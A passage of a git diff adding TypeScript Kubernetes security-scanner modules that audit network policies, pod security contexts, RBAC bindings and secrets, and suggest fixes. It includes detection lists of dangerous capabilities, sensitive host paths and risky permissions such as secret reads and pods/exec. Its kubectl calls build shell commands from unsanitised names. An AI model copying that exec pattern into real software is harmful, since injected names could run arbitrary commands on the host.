+      const namespacesWithoutPolicies = await getNamespacesWithoutPolicies()
+      for (const ns of namespacesWithoutPolicies) {
+        findings.push(createFinding(
+          ns,
+          "medium",
+          `No Network Policies in Namespace: ${ns}`,
+          `Namespace ${ns} has no network policies. All pod-to-pod traffic is allowed.`,
+          "Create network policies to restrict pod-to-pod communication"
+        ))
+      }
+
+      // Analyze each policy
+      for (const policy of policies) {
+        const policyFindings = analyzePolicy(policy)
+        findings.push(...policyFindings)
+      }
+
+      // Check for default deny policies
+      const hasDenyIngress = policies.some((p) =>
+        p.policyTypes.includes("Ingress") &&
+        (!p.ingress || p.ingress.length === 0) &&
+        Object.keys(p.podSelector || {}).length === 0
+      )
+
+      const hasDenyEgress = policies.some((p) =>
+        p.policyTypes.includes("Egress") &&
+        (!p.egress || p.egress.length === 0) &&
+        Object.keys(p.podSelector || {}).length === 0
+      )
+
+      if (!hasDenyIngress) {
+        findings.push(createFinding(
+          namespace || "cluster",
+          "medium",
+          "No Default Deny Ingress Policy",
+          "No default deny ingress network policy found. Pods may receive traffic from any source.",
+          "Create a default deny ingress network policy"
+        ))
+      }
+
+      if (!hasDenyEgress) {
+        findings.push(createFinding(
+          namespace || "cluster",
+          "medium",
+          "No Default Deny Egress Policy",
+          "No default deny egress network policy found. Pods may send traffic to any destination.",
+          "Create a default deny egress network policy"
+        ))
+      }
+
+      log.info("Network policy analysis complete", { findings: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Network policy analysis failed", { error })
+      throw error
+    }
+  }
+
+  /**
+   * Analyze a single policy
+   */
+  function analyzePolicy(policy: ContainerScanTypes.NetworkPolicy): ContainerScanTypes.ContainerFinding[] {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    // Check for overly permissive ingress
+    for (const ingress of policy.ingress || []) {
+      for (const from of ingress.from || []) {
+        // Allow from any pod
+        if (from.podSelector && Object.keys(from.podSelector).length === 0 && !from.namespaceSelector) {
+          findings.push(createFinding(
+            policy.namespace,
+            "medium",
+            `Permissive Ingress: ${policy.name}`,
+            `Network policy ${policy.name} allows ingress from any pod in the namespace`,
+            "Restrict ingress with specific pod selectors"
+          ))
+        }
+
+        // Allow from any namespace
+        if (from.namespaceSelector && Object.keys(from.namespaceSelector).length === 0) {
+          findings.push(createFinding(
+            policy.namespace,
+            "high",
+            `Cross-Namespace Ingress: ${policy.name}`,
+            `Network policy ${policy.name} allows ingress from any namespace`,
+            "Restrict ingress with specific namespace selectors"
+          ))
+        }
+
+        // Allow from internet (0.0.0.0/0)
+        if (from.ipBlock?.cidr === "0.0.0.0/0") {
+          findings.push(createFinding(
+            policy.namespace,
+            "high",
+            `Internet Ingress: ${policy.name}`,
+            `Network policy ${policy.name} allows ingress from the internet (0.0.0.0/0)`,
+            "Restrict ingress to specific IP ranges"
+          ))
+        }
+      }
+    }
+
+    // Check for overly permissive egress
+    for (const egress of policy.egress || []) {
+      for (const to of egress.to || []) {
+        // Allow to any pod
+        if (to.podSelector && Object.keys(to.podSelector).length === 0 && !to.namespaceSelector) {
+          findings.push(createFinding(
+            policy.namespace,
+            "low",
+            `Permissive Egress: ${policy.name}`,
+            `Network policy ${policy.name} allows egress to any pod in the namespace`,
+            "Restrict egress with specific pod selectors"
+          ))
+        }
+
+        // Allow to internet (0.0.0.0/0)
+        if (to.ipBlock?.cidr === "0.0.0.0/0") {
+          findings.push(createFinding(
+            policy.namespace,
+            "medium",
+            `Internet Egress: ${policy.name}`,
+            `Network policy ${policy.name} allows egress to the internet (0.0.0.0/0)`,
+            "Restrict egress to specific IP ranges or use a proxy"
+          ))
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Check if a pod is covered by network policies
+   */
+  export async function checkPodCoverage(
+    podName: string,
+    namespace: string
+  ): Promise<{ covered: boolean; policies: string[] }> {
+    try {
+      // Get pod labels
+      const { stdout: podOut } = await execAsync(
+        `kubectl get pod ${podName} -n ${namespace} -o jsonpath='{.metadata.labels}'`
+      )
+      const podLabels = JSON.parse(podOut.replace(/'/g, ""))
+
+      // Get network policies in namespace
+      const policies = await listNetworkPolicies(namespace)
+
+      const coveringPolicies: string[] = []
+
+      for (const policy of policies) {
+        const selector = policy.podSelector || {}
+
+        // Check if pod matches policy selector
+        let matches = true
+        for (const [key, value] of Object.entries(selector)) {
+          if (podLabels[key] !== value) {
+            matches = false
+            break
+          }
+        }
+
+        // Empty selector matches all pods
+        if (Object.keys(selector).length === 0) {
+          matches = true
+        }
+
+        if (matches) {
+          coveringPolicies.push(policy.name)
+        }
+      }
+
+      return {
+        covered: coveringPolicies.length > 0,
+        policies: coveringPolicies,
+      }
+    } catch (error) {
+      log.error("Failed to check pod coverage", { podName, namespace, error })
+      return { covered: false, policies: [] }
+    }
+  }
+
+  /**
+   * Parse network policy from kubectl JSON
+   */
+  function parseNetworkPolicy(item: Record<string, unknown>): ContainerScanTypes.NetworkPolicy {
+    const metadata = item.metadata as Record<string, unknown>
+    const spec = item.spec as Record<string, unknown>
+
+    return {
+      name: metadata.name as string,
+      namespace: metadata.namespace as string,
+      podSelector: spec.podSelector as Record<string, string>,
+      policyTypes: (spec.policyTypes || ["Ingress"]) as ("Ingress" | "Egress")[],
+      ingress: spec.ingress as ContainerScanTypes.NetworkPolicy["ingress"],
+      egress: spec.egress as ContainerScanTypes.NetworkPolicy["egress"],
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    namespace: string,
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `k8s-network-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "network",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "cluster",
+        name: namespace,
+        namespace,
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-kubernetes", control: "Network Policies" },
+        { framework: "nsa-cisa", control: "Network Separation and Hardening" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate default deny policy template
+   */
+  export function generateDefaultDenyPolicy(namespace: string): string {
+    return `apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+  name: default-deny-all
+  namespace: ${namespace}
+spec:
+  podSelector: {}
+  policyTypes:
+  - Ingress
+  - Egress`
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/pods.ts b/packages/opencode/src/pentest/containerscan/kubernetes/pods.ts
new file mode 100644
index 00000000000..77be9bd6dae
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/pods.ts
@@ -0,0 +1,354 @@
+/**
+ * @fileoverview Kubernetes Pod Security Scanner
+ *
+ * Analyzes pod security configurations and policies.
+ *
+ * @module pentest/containerscan/kubernetes/pods
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.kubernetes.pods" })
+
+/**
+ * Kubernetes Pods namespace
+ */
+export namespace KubernetesPods {
+  /**
+   * List pods in a namespace or all namespaces
+   */
+  export async function list(namespace?: string): Promise<ContainerScanTypes.Pod[]> {
+    try {
+      const cmd = namespace
+        ? `kubectl get pods -n ${namespace} -o json`
+        : "kubectl get pods --all-namespaces -o json"
+
+      const { stdout } = await execAsync(cmd)
+      const data = JSON.parse(stdout)
+
+      const pods: ContainerScanTypes.Pod[] = []
+
+      for (const item of data.items || []) {
+        pods.push(parsePod(item))
+      }
+
+      log.info("Pods listed", { count: pods.length, namespace: namespace || "all" })
+      return pods
+    } catch (error) {
+      log.error("Failed to list pods", { error, namespace })
+      throw new Error(`Failed to list pods: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Get pod details
+   */
+  export async function get(name: string, namespace: string): Promise<ContainerScanTypes.Pod> {
+    try {
+      const { stdout } = await execAsync(`kubectl get pod ${name} -n ${namespace} -o json`)
+      return parsePod(JSON.parse(stdout))
+    } catch (error) {
+      throw new Error(`Failed to get pod: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Analyze pod for security issues
+   */
+  export async function analyzePod(
+    pod: ContainerScanTypes.Pod,
+    scanId: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    // Check host namespaces
+    if (pod.hostNetwork) {
+      findings.push(createFinding(pod, "high", "Host Network Enabled",
+        "Pod uses host network namespace, bypassing network isolation.",
+        "Set hostNetwork: false unless required"))
+    }
+
+    if (pod.hostPID) {
+      findings.push(createFinding(pod, "high", "Host PID Namespace Enabled",
+        "Pod shares the host PID namespace, allowing visibility of host processes.",
+        "Set hostPID: false unless required"))
+    }
+
+    if (pod.hostIPC) {
+      findings.push(createFinding(pod, "high", "Host IPC Namespace Enabled",
+        "Pod shares the host IPC namespace, potentially allowing access to shared memory.",
+        "Set hostIPC: false unless required"))
+    }
+
+    // Check default service account
+    if (pod.serviceAccountName === "default") {
+      findings.push(createFinding(pod, "medium", "Default Service Account Used",
+        "Pod uses the default service account. Consider using a dedicated service account.",
+        "Create and use a dedicated service account with minimal permissions"))
+    }
+
+    // Check pod security context
+    if (!pod.securityContext) {
+      findings.push(createFinding(pod, "medium", "No Pod Security Context",
+        "Pod has no security context defined at the pod level.",
+        "Define a security context with runAsNonRoot and other security settings"))
+    } else {
+      if (!pod.securityContext.runAsNonRoot) {
+        findings.push(createFinding(pod, "high", "Pod May Run as Root",
+          "Pod does not enforce runAsNonRoot, containers may run as root.",
+          "Set securityContext.runAsNonRoot: true"))
+      }
+    }
+
+    // Check container security contexts
+    for (const container of pod.containers) {
+      const ctx = container.securityContext
+
+      // Privileged container
+      if (ctx?.privileged) {
+        findings.push(createFinding(pod, "critical", `Privileged Container: ${container.name}`,
+          `Container ${container.name} is running in privileged mode.`,
+          `Set securityContext.privileged: false for container ${container.name}`))
+      }
+
+      // Allow privilege escalation
+      if (ctx?.allowPrivilegeEscalation !== false) {
+        findings.push(createFinding(pod, "high", `Privilege Escalation Allowed: ${container.name}`,
+          `Container ${container.name} allows privilege escalation.`,
+          `Set securityContext.allowPrivilegeEscalation: false for container ${container.name}`))
+      }
+
+      // Read-only root filesystem
+      if (!ctx?.readOnlyRootFilesystem) {
+        findings.push(createFinding(pod, "medium", `Writable Root Filesystem: ${container.name}`,
+          `Container ${container.name} has a writable root filesystem.`,
+          `Set securityContext.readOnlyRootFilesystem: true for container ${container.name}`))
+      }
+
+      // Running as root
+      if (ctx?.runAsUser === 0) {
+        findings.push(createFinding(pod, "high", `Running as Root: ${container.name}`,
+          `Container ${container.name} is explicitly running as root (UID 0).`,
+          `Set securityContext.runAsUser to a non-root UID for container ${container.name}`))
+      }
+
+      // Capabilities
+      if (ctx?.capabilities?.add && ctx.capabilities.add.length > 0) {
+        const dangerousCaps = ["SYS_ADMIN", "NET_ADMIN", "SYS_PTRACE", "SYS_MODULE"]
+        const addedDangerous = ctx.capabilities.add.filter((c) => dangerousCaps.includes(c))
+        if (addedDangerous.length > 0) {
+          findings.push(createFinding(pod, "high", `Dangerous Capabilities: ${container.name}`,
+            `Container ${container.name} has dangerous capabilities: ${addedDangerous.join(", ")}`,
+            `Remove dangerous capabilities from container ${container.name}`))
+        }
+      }
+
+      if (!ctx?.capabilities?.drop?.includes("ALL")) {
+        findings.push(createFinding(pod, "medium", `Capabilities Not Dropped: ${container.name}`,
+          `Container ${container.name} does not drop all capabilities.`,
+          `Add 'ALL' to securityContext.capabilities.drop for container ${container.name}`))
+      }
+
+      // Resource limits
+      if (!container.resources?.limits) {
+        findings.push(createFinding(pod, "low", `No Resource Limits: ${container.name}`,
+          `Container ${container.name} has no resource limits defined.`,
+          `Define resource limits for container ${container.name}`))
+      }
+
+      // Image tag
+      if (container.image.endsWith(":latest") || !container.image.includes(":")) {
+        findings.push(createFinding(pod, "medium", `Latest or No Tag: ${container.name}`,
+          `Container ${container.name} uses 'latest' tag or no tag. This is not recommended.`,
+          `Use specific image tags instead of 'latest' for container ${container.name}`))
+      }
+    }
+
+    // Check for sensitive volume mounts
+    for (const volume of pod.volumes || []) {
+      if (volume.hostPath) {
+        const sensitivePs = ["/", "/etc", "/var/run/docker.sock", "/proc", "/sys"]
+        if (sensitivePs.includes(volume.hostPath.path)) {
+          findings.push(createFinding(pod, "critical", `Sensitive Host Path Mounted: ${volume.name}`,
+            `Pod mounts sensitive host path: ${volume.hostPath.path}`,
+            `Remove hostPath mount of ${volume.hostPath.path}`))
+        }
+      }
+    }
+
+    // Emit event
+    Bus.publish(ContainerScanEvents.PodAnalyzed, {
+      scanId,
+      name: pod.name,
+      namespace: pod.namespace,
+      findingsCount: findings.length,
+    })
+
+    return findings
+  }
+
+  /**
+   * Analyze all pods
+   */
+  export async function analyzeAll(
+    scanId: string,
+    namespace?: string
+  ): Promise<{
+    pods: ContainerScanTypes.Pod[]
+    findings: ContainerScanTypes.ContainerFinding[]
+    stats: {
+      totalPods: number
+      privilegedPods: number
+      hostNetworkPods: number
+    }
+  }> {
+    const pods = await list(namespace)
+    const allFindings: ContainerScanTypes.ContainerFinding[] = []
+
+    let privilegedCount = 0
+    let hostNetworkCount = 0
+
+    for (const pod of pods) {
+      const findings = await analyzePod(pod, scanId)
+      allFindings.push(...findings)
+
+      // Count stats
+      if (pod.hostNetwork) hostNetworkCount++
+      for (const container of pod.containers) {
+        if (container.securityContext?.privileged) {
+          privilegedCount++
+          break
+        }
+      }
+    }
+
+    return {
+      pods,
+      findings: allFindings,
+      stats: {
+        totalPods: pods.length,
+        privilegedPods: privilegedCount,
+        hostNetworkPods: hostNetworkCount,
+      },
+    }
+  }
+
+  /**
+   * Run kubeaudit on pods
+   */
+  export async function auditWithKubeaudit(
+    scanId: string,
+    namespace?: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    try {
+      const cmd = namespace
+        ? `kubeaudit all -n ${namespace} --json`
+        : "kubeaudit all --json"
+
+      const { stdout } = await execAsync(cmd, { timeout: 300000 })
+
+      // Import kubeaudit parser
+      const { KubeauditParser } = await import("../parsers/kubeaudit")
+      const findings = KubeauditParser.parse(stdout)
+
+      log.info("Kubeaudit complete", { findings: findings.length, namespace: namespace || "all" })
+      return findings
+    } catch (error) {
+      log.error("Kubeaudit failed", { error })
+      throw new Error(`Kubeaudit failed: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Parse pod from kubectl JSON
+   */
+  function parsePod(item: Record<string, unknown>): ContainerScanTypes.Pod {
+    const metadata = item.metadata as Record<string, unknown>
+    const spec = item.spec as Record<string, unknown>
+    const status = item.status as Record<string, unknown>
+
+    const containers: ContainerScanTypes.Pod["containers"] = []
+    for (const c of (spec.containers || []) as Record<string, unknown>[]) {
+      containers.push({
+        name: c.name as string,
+        image: c.image as string,
+        securityContext: parseSecurityContext(c.securityContext as Record<string, unknown>),
+        ports: (c.ports || []) as { containerPort: number; protocol?: string }[],
+        volumeMounts: (c.volumeMounts || []) as { name: string; mountPath: string; readOnly?: boolean }[],
+        resources: c.resources as { limits?: Record<string, string>; requests?: Record<string, string> },
+      })
+    }
+
+    return {
+      name: metadata.name as string,
+      namespace: metadata.namespace as string,
+      uid: metadata.uid as string,
+      labels: metadata.labels as Record<string, string>,
+      annotations: metadata.annotations as Record<string, string>,
+      nodeName: spec.nodeName as string,
+      serviceAccountName: (spec.serviceAccountName as string) || "default",
+      hostNetwork: (spec.hostNetwork as boolean) || false,
+      hostPID: (spec.hostPID as boolean) || false,
+      hostIPC: (spec.hostIPC as boolean) || false,
+      securityContext: parseSecurityContext(spec.securityContext as Record<string, unknown>),
+      containers,
+      volumes: (spec.volumes || []) as ContainerScanTypes.Pod["volumes"],
+      status: status?.phase as ContainerScanTypes.Pod["status"],
+    }
+  }
+
+  /**
+   * Parse security context
+   */
+  function parseSecurityContext(ctx?: Record<string, unknown>): ContainerScanTypes.PodSecurityContext | undefined {
+    if (!ctx) return undefined
+
+    return {
+      runAsUser: ctx.runAsUser as number | undefined,
+      runAsGroup: ctx.runAsGroup as number | undefined,
+      runAsNonRoot: ctx.runAsNonRoot as boolean | undefined,
+      fsGroup: ctx.fsGroup as number | undefined,
+      privileged: ctx.privileged as boolean | undefined,
+      allowPrivilegeEscalation: ctx.allowPrivilegeEscalation as boolean | undefined,
+      readOnlyRootFilesystem: ctx.readOnlyRootFilesystem as boolean | undefined,
+      capabilities: ctx.capabilities as { add: string[]; drop: string[] } | undefined,
+      seccompProfile: (ctx.seccompProfile as Record<string, string>)?.type,
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    pod: ContainerScanTypes.Pod,
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `k8s-pod-${pod.name}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "misconfiguration",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "pod",
+        name: pod.name,
+        namespace: pod.namespace,
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-kubernetes", control: "Pod Security" },
+        { framework: "nsa-cisa", control: "Kubernetes Hardening" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/rbac.ts b/packages/opencode/src/pentest/containerscan/kubernetes/rbac.ts
new file mode 100644
index 00000000000..53f7ef64f9c
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/rbac.ts
@@ -0,0 +1,340 @@
+/**
+ * @fileoverview Kubernetes RBAC Analyzer
+ *
+ * Analyzes RBAC configurations for security issues.
+ *
+ * @module pentest/containerscan/kubernetes/rbac
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.kubernetes.rbac" })
+
+/**
+ * Dangerous RBAC permissions
+ */
+const DANGEROUS_PERMISSIONS = [
+  { resources: ["*"], verbs: ["*"] },
+  { resources: ["secrets"], verbs: ["*", "get", "list"] },
+  { resources: ["pods/exec"], verbs: ["*", "create"] },
+  { resources: ["pods/attach"], verbs: ["*", "create"] },
+  { resources: ["pods"], verbs: ["*", "delete"] },
+  { resources: ["clusterroles"], verbs: ["*", "bind", "escalate"] },
+  { resources: ["clusterrolebindings"], verbs: ["*", "create"] },
+  { resources: ["roles"], verbs: ["*", "bind", "escalate"] },
+  { resources: ["rolebindings"], verbs: ["*", "create"] },
+]
+
+/**
+ * Kubernetes RBAC namespace
+ */
+export namespace KubernetesRBAC {
+  /**
+   * List cluster role bindings
+   */
+  export async function listClusterRoleBindings(): Promise<ContainerScanTypes.RBACBinding[]> {
+    try {
+      const { stdout } = await execAsync("kubectl get clusterrolebindings -o json")
+      const data = JSON.parse(stdout)
+      return (data.items || []).map(parseBinding)
+    } catch (error) {
+      log.error("Failed to list cluster role bindings", { error })
+      throw new Error(`Failed to list cluster role bindings: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * List role bindings in namespace
+   */
+  export async function listRoleBindings(namespace?: string): Promise<ContainerScanTypes.RBACBinding[]> {
+    try {
+      const cmd = namespace
+        ? `kubectl get rolebindings -n ${namespace} -o json`
+        : "kubectl get rolebindings --all-namespaces -o json"
+
+      const { stdout } = await execAsync(cmd)
+      const data = JSON.parse(stdout)
+      return (data.items || []).map(parseBinding)
+    } catch (error) {
+      log.error("Failed to list role bindings", { error })
+      throw new Error(`Failed to list role bindings: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * List cluster roles
+   */
+  export async function listClusterRoles(): Promise<ContainerScanTypes.RBACRole[]> {
+    try {
+      const { stdout } = await execAsync("kubectl get clusterroles -o json")
+      const data = JSON.parse(stdout)
+      return (data.items || []).map(parseRole)
+    } catch (error) {
+      log.error("Failed to list cluster roles", { error })
+      throw new Error(`Failed to list cluster roles: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Get role details
+   */
+  export async function getRole(name: string, namespace?: string): Promise<ContainerScanTypes.RBACRole> {
+    try {
+      const cmd = namespace
+        ? `kubectl get role ${name} -n ${namespace} -o json`
+        : `kubectl get clusterrole ${name} -o json`
+
+      const { stdout } = await execAsync(cmd)
+      return parseRole(JSON.parse(stdout))
+    } catch (error) {
+      throw new Error(`Failed to get role: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Analyze RBAC configuration
+   */
+  export async function analyze(scanId: string): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      // Analyze cluster role bindings
+      const clusterBindings = await listClusterRoleBindings()
+      for (const binding of clusterBindings) {
+        const bindingFindings = await analyzeBinding(binding, scanId)
+        findings.push(...bindingFindings)
+      }
+
+      // Analyze role bindings
+      const roleBindings = await listRoleBindings()
+      for (const binding of roleBindings) {
+        const bindingFindings = await analyzeBinding(binding, scanId)
+        findings.push(...bindingFindings)
+      }
+
+      log.info("RBAC analysis complete", { findings: findings.length })
+      return findings
+    } catch (error) {
+      log.error("RBAC analysis failed", { error })
+      throw error
+    }
+  }
+
+  /**
+   * Analyze a single binding
+   */
+  async function analyzeBinding(
+    binding: ContainerScanTypes.RBACBinding,
+    scanId: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    // Check for cluster-admin binding
+    if (binding.roleRef.name === "cluster-admin") {
+      for (const subject of binding.subjects) {
+        findings.push(createFinding(
+          binding,
+          "critical",
+          `Cluster Admin Binding: ${subject.name}`,
+          `${subject.kind} "${subject.name}" has cluster-admin privileges via ${binding.name}`,
+          "Review if cluster-admin access is necessary and consider using more restrictive roles"
+        ))
+
+        Bus.publish(ContainerScanEvents.RBACIssueFound, {
+          scanId,
+          bindingName: binding.name,
+          kind: binding.kind,
+          severity: "critical",
+          issue: `${subject.kind} ${subject.name} has cluster-admin`,
+        })
+      }
+    }
+
+    // Check for default service account usage
+    for (const subject of binding.subjects) {
+      if (subject.kind === "ServiceAccount" && subject.name === "default") {
+        findings.push(createFinding(
+          binding,
+          "medium",
+          `Default Service Account in Binding: ${binding.name}`,
+          `Binding ${binding.name} grants permissions to the default service account`,
+          "Use dedicated service accounts instead of default"
+        ))
+      }
+    }
+
+    // Check for wildcard subjects (all users/groups)
+    for (const subject of binding.subjects) {
+      if (subject.name === "*" || subject.name === "system:authenticated" || subject.name === "system:unauthenticated") {
+        findings.push(createFinding(
+          binding,
+          subject.name === "system:unauthenticated" ? "critical" : "high",
+          `Broad Subject in Binding: ${binding.name}`,
+          `Binding ${binding.name} grants permissions to ${subject.name}`,
+          "Restrict binding to specific users or service accounts"
+        ))
+      }
+    }
+
+    // Analyze the role for dangerous permissions
+    try {
+      const role = await getRole(binding.roleRef.name, binding.namespace)
+      const dangerousPerms = checkDangerousPermissions(role)
+
+      for (const perm of dangerousPerms) {
+        findings.push(createFinding(
+          binding,
+          "high",
+          `Dangerous Permission: ${perm.resources.join(",")}/${perm.verbs.join(",")}`,
+          `Role ${role.name} bound by ${binding.name} has dangerous permissions: ${perm.resources.join(",")} with verbs ${perm.verbs.join(",")}`,
+          "Review and restrict the permissions in the role"
+        ))
+      }
+    } catch {
+      // Role might not be accessible
+    }
+
+    return findings
+  }
+
+  /**
+   * Check for who can perform an action
+   */
+  export async function whoCanPerform(
+    verb: string,
+    resource: string,
+    namespace?: string
+  ): Promise<{ kind: string; name: string; namespace?: string }[]> {
+    try {
+      const cmd = namespace
+        ? `kubectl auth can-i ${verb} ${resource} -n ${namespace} --list 2>/dev/null || true`
+        : `kubectl auth can-i ${verb} ${resource} --list 2>/dev/null || true`
+
+      const { stdout } = await execAsync(cmd)
+      const results: { kind: string; name: string; namespace?: string }[] = []
+
+      // Parse output
+      const lines = stdout.trim().split("\n")
+      for (const line of lines) {
+        if (line.includes("yes")) {
+          // This is a simplified parser - real implementation would be more robust
+          results.push({ kind: "Unknown", name: line.split(/\s+/)[0] })
+        }
+      }
+
+      return results
+    } catch {
+      return []
+    }
+  }
+
+  /**
+   * Check if a role has dangerous permissions
+   */
+  function checkDangerousPermissions(
+    role: ContainerScanTypes.RBACRole
+  ): { resources: string[]; verbs: string[] }[] {
+    const dangerous: { resources: string[]; verbs: string[] }[] = []
+
+    for (const rule of role.rules) {
+      for (const danger of DANGEROUS_PERMISSIONS) {
+        const hasResource = danger.resources.some((r) =>
+          rule.resources.includes(r) || rule.resources.includes("*")
+        )
+        const hasVerb = danger.verbs.some((v) =>
+          rule.verbs.includes(v) || rule.verbs.includes("*")
+        )
+
+        if (hasResource && hasVerb) {
+          dangerous.push({
+            resources: rule.resources,
+            verbs: rule.verbs,
+          })
+        }
+      }
+    }
+
+    return dangerous
+  }
+
+  /**
+   * Parse binding from kubectl JSON
+   */
+  function parseBinding(item: Record<string, unknown>): ContainerScanTypes.RBACBinding {
+    const metadata = item.metadata as Record<string, unknown>
+    const roleRef = item.roleRef as Record<string, unknown>
+    const subjects = (item.subjects || []) as Record<string, unknown>[]
+
+    return {
+      name: metadata.name as string,
+      namespace: metadata.namespace as string | undefined,
+      kind: item.kind as "RoleBinding" | "ClusterRoleBinding",
+      roleRef: {
+        kind: roleRef.kind as "Role" | "ClusterRole",
+        name: roleRef.name as string,
+        apiGroup: roleRef.apiGroup as string,
+      },
+      subjects: subjects.map((s) => ({
+        kind: s.kind as "User" | "Group" | "ServiceAccount",
+        name: s.name as string,
+        namespace: s.namespace as string | undefined,
+      })),
+    }
+  }
+
+  /**
+   * Parse role from kubectl JSON
+   */
+  function parseRole(item: Record<string, unknown>): ContainerScanTypes.RBACRole {
+    const metadata = item.metadata as Record<string, unknown>
+    const rules = (item.rules || []) as Record<string, unknown>[]
+
+    return {
+      name: metadata.name as string,
+      namespace: metadata.namespace as string | undefined,
+      kind: item.kind as "Role" | "ClusterRole",
+      rules: rules.map((r) => ({
+        apiGroups: (r.apiGroups || []) as string[],
+        resources: (r.resources || []) as string[],
+        verbs: (r.verbs || []) as string[],
+        resourceNames: r.resourceNames as string[] | undefined,
+      })),
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    binding: ContainerScanTypes.RBACBinding,
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `k8s-rbac-${binding.name}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "rbac",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "cluster",
+        name: binding.name,
+        namespace: binding.namespace,
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-kubernetes", control: "RBAC and Service Accounts" },
+        { framework: "nsa-cisa", control: "Authentication and Authorization" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/secrets.ts b/packages/opencode/src/pentest/containerscan/kubernetes/secrets.ts
new file mode 100644
index 00000000000..5f6e702fa4f
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/secrets.ts
@@ -0,0 +1,291 @@
+/**
+ * @fileoverview Kubernetes Secrets Analyzer
+ *
+ * Analyzes Kubernetes secrets for security issues.
+ *
+ * @module pentest/containerscan/kubernetes/secrets
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.kubernetes.secrets" })
+
+/**
+ * Kubernetes Secrets namespace
+ */
+export namespace KubernetesSecrets {
+  /**
+   * List secrets (metadata only, no values)
+   */
+  export async function list(namespace?: string): Promise<ContainerScanTypes.K8sSecret[]> {
+    try {
+      const cmd = namespace
+        ? `kubectl get secrets -n ${namespace} -o json`
+        : "kubectl get secrets --all-namespaces -o json"
+
+      const { stdout } = await execAsync(cmd)
+      const data = JSON.parse(stdout)
+
+      return (data.items || []).map(parseSecret)
+    } catch (error) {
+      log.error("Failed to list secrets", { error })
+      throw new Error(`Failed to list secrets: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Analyze secrets for security issues
+   */
+  export async function analyze(namespace?: string): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      const secrets = await list(namespace)
+
+      for (const secret of secrets) {
+        const secretFindings = analyzeSecret(secret)
+        findings.push(...secretFindings)
+      }
+
+      // Check for secrets not used by any pod
+      const unusedSecrets = await findUnusedSecrets(namespace)
+      for (const secretName of unusedSecrets) {
+        findings.push(createFinding(
+          secretName.name,
+          secretName.namespace,
+          "low",
+          `Unused Secret: ${secretName.name}`,
+          `Secret ${secretName.name} in namespace ${secretName.namespace} is not used by any pod`,
+          "Review and remove unused secrets"
+        ))
+      }
+
+      log.info("Secret analysis complete", { findings: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Secret analysis failed", { error })
+      throw error
+    }
+  }
+
+  /**
+   * Analyze a single secret
+   */
+  function analyzeSecret(secret: ContainerScanTypes.K8sSecret): ContainerScanTypes.ContainerFinding[] {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    // Check for default service account token
+    if (secret.type === "kubernetes.io/service-account-token" && secret.name.startsWith("default-token")) {
+      findings.push(createFinding(
+        secret.name,
+        secret.namespace,
+        "low",
+        "Default Service Account Token",
